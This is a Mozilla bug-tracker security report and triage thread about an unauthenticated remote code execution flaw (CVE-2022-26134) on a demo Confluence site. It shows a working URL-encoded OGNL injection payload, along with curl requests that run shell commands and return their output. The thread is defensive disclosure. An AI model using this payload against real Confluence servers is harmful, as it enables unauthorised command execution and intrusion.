RCE on confluence.mozilla-community.org (CVE-2022-26134)
Categories
(Participation Infrastructure :: MCWS, defect)
Tracking
(Not tracked)
People
(Reporter: nonsleepr, Unassigned)
References
Details
(Keywords: reporter-external, sec-critical, wsec-injection)
Attachments
(1 file)
|
136.12 KB,
image/png
|
Details |
2022-06-03 18_12_10-confluence.mozilla-community.org CVE-2022-26134.png
Steps to reproduce:
The Confluence website can be exploited without authentication.
For example the following request would execute whoami and return the results in the X-Cmd-Response header:
https://confluence.mozilla-community.org/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
Actual results:
The website executed the shell command and returned results in X-Cmd-Response header.
Expected results:
No command execution should happen.
|
||
Updated•3 years ago
|
|
|
||
Comment 3•3 years ago
•
|
||
Hello,
Thank you for your report.
I can confirm that the commands are being executed:
using whoami command
% curl -I "https://confluence.mozilla-community.org/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
HTTP/1.1 302
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 04 Jun 2022 09:27:17 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
X-ASEN: SEN-5034594
X-Confluence-Request-Time: 1654334837340
Set-Cookie: JSESSIONID=95B685A40E8C0BB5B61B581E1FE4AAA4; Path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-Cmd-Response: confluence
and using hostname command
% curl -I "https://confluence.mozilla-community.org/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22hostname%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
HTTP/1.1 302
Server: nginx/1.14.0 (Ubuntu)
Date: Sat, 04 Jun 2022 09:28:16 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
X-ASEN: SEN-5034594
X-Confluence-Request-Time: 1654334896559
Set-Cookie: JSESSIONID=BEDD534D535FE3690008280AF0C1FE7F; Path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-Cmd-Response: ip-172-31-7-75
I am trying to track down the owner of this instance.
Thanks,
Frida
|
|
||
Updated•3 years ago
|
|
|
||
Updated•3 years ago
|
|
|
||
Comment 5•3 years ago
|
||
The community Confluence instance was taken down since it is not being used and was only setup as a demo.
Thanks again for reporting this issue.
Thanks,
Frida
|
|
||
Comment 6•3 years ago
|
||
The community Confluence instance was taken down since it is not being used and was only setup as a demo.
Thanks again for reporting this issue.
Thanks,
Frida
|
|
||
Comment 7•3 years ago
|
||
Hello,
We decided to award hall of fame mention to this report on our website, https://www.mozilla.org/en-US/security/bug-bounty/web-hall-of-fame/, please let us know how you would like to be mentioned.
Thanks again for your report.
Thanks,
Frida
Hello,
Yes please. I'd be happy to be mentioned as Alexander Bessonov with the link to my Twitter account (@nonsleepr).
Thanks.
|
||
Updated•3 years ago
|
|
|
||
Updated•2 years ago
|
|
||
Updated•11 months ago
|
Description
•